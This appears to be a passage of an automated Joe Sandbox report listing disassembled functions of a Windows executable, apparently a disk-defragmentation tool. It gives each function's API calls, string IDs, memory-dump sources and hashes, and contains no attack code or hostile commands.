                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402070$8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2552552646
                                                                                                                                                                                                                                                                                    • Opcode ID: 6384bc0adda1adbdeeaa232fbe6d5e5c44dd02d8d9a91ec8063ab249e187767e
                                                                                                                                                                                                                                                                                    • Instruction ID: 23aea299cf4aedd1e52cc8b362e96f09b4e9ad3ffc0a2f21466a88d2017f33b3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6384bc0adda1adbdeeaa232fbe6d5e5c44dd02d8d9a91ec8063ab249e187767e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C219272204300AFC310DB14DD85F9BB7E8FB88B24F004A2EF55EA22D0DB74A905CB5A
                                                                                                                                                                                                                                                                                    Function 00423020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 004230DC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                    • Instruction ID: 16e62712f1819d0f9283694aa4ee6730415ba22870223c05465c6e43f049811c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20214D75300A13AFC61CEB39D8998F9F3AAFF88305784422DE91A87251CB247D51CBD4
                                                                                                                                                                                                                                                                                    Function 0041DF00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DF73
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                    • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                    • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                    • Opcode ID: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                    • Instruction ID: 5d073b895f258575d86a17cdac6f59c45116d1a3496c0b5e65ce3dbb7a15869e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B213CB5908301DFC304DF64D985B9ABBE4FF98710F004A2EF45A83290EB74D588CB96
                                                                                                                                                                                                                                                                                    Function 00402980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004029C9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402A11
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 90b17b05424b2c62125107ea6cc347fd3112fc48176a53c09daaf49607d71c2d
                                                                                                                                                                                                                                                                                    • Instruction ID: 67af94f4d0bbb15246a849000ec73e7ae4faebe480045c9460922c1e7266e159
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b17b05424b2c62125107ea6cc347fd3112fc48176a53c09daaf49607d71c2d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11014FB138031422E97576B26F47BEF12458B54B08F10042BFB09B92C2EAEDE482459F
                                                                                                                                                                                                                                                                                    Function 0045CF60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,BB40E64E,?,?,?,00478D19,000000FF,0045997D,?), ref: 0045CF8C
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,20000000,00000000), ref: 0045CFE9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                    • String ID: \\?\
                                                                                                                                                                                                                                                                                    • API String ID: 415043291-4282027825
                                                                                                                                                                                                                                                                                    • Opcode ID: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction ID: 901598558c3e4d11bc3258ba10a6420141faa6f62916cefdcf4a46bf13df9223
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB1173766083009FE310CB54EC89F5BB7A9FB84721F10492EF959973D0D7789848C795
                                                                                                                                                                                                                                                                                    Function 00410390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 00410404
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1310182199
                                                                                                                                                                                                                                                                                    • Opcode ID: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                    • Instruction ID: 09b5b65d6a19d25cf5f991273958dae6b0a4a0afcd6ef2ce1ca3dc747381d305
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3114F75200248AFCB30EF2ADC85AC933A4AB54314F11443FAD0DAB392DE79A9458B58
                                                                                                                                                                                                                                                                                    Function 0042F177 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 79a77201152678a81144e55eba1330838be5272e1844f0c3915291d1357643a1
                                                                                                                                                                                                                                                                                    • Instruction ID: e2c7429d35eb79f017d7d9d53c2d9adddc48fbc63db9da39a1e6c1575c1991e3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79a77201152678a81144e55eba1330838be5272e1844f0c3915291d1357643a1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01C835740321DBD7209F60DD81B2E77B07F48700FD1087AE905A7290D7B4BC448AAD
                                                                                                                                                                                                                                                                                    Function 0041DB30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateDriveDrivesInitializeInstanceLogicalTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 16435998-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction ID: b0155039b9989220c3f10694d0f533bb6dad7ff0edda0b00871a7334ab537921
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2901D4B6A183119B8314DF28DCC56AB73A5EB89314B01453FE45AC7251EB78AC84CBCA
                                                                                                                                                                                                                                                                                    Function 0042D490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D4B8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D4DD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 29b101547385324777d1e1e58dcd704a1adca7d24db5bd4c7a528e124d161c24
                                                                                                                                                                                                                                                                                    • Instruction ID: ee58587f9df8cc875d776869306883827de9a08da503ac3836b7653e0a5f6a06
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29b101547385324777d1e1e58dcd704a1adca7d24db5bd4c7a528e124d161c24
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF08972B4032036F53067B56D47F6B729C8B44B55F50056AF709DA1C1D9B4A80182AD
                                                                                                                                                                                                                                                                                    Function 0040FF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001206,00000000,?), ref: 0040FFA8
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0040FFC7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRedrawSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1030633669-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 4ce7ece4b0a7efd2be3ee5ecb6c152e4b3cc99dfbb2e460ec5d5cc11a63afa27
                                                                                                                                                                                                                                                                                    • Instruction ID: 0242e16c6b59478c3515ab3b1b4cca95650c18fcbf546397f4596530e5178a32
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ce7ece4b0a7efd2be3ee5ecb6c152e4b3cc99dfbb2e460ec5d5cc11a63afa27
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B014671604701AFC320DF28D881F5BB7E4BB88700F004A2EF999D7280E670E944CB96
                                                                                                                                                                                                                                                                                    Function 00460070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: JD
                                                                                                                                                                                                                                                                                    • API String ID: 9847766-1871045537
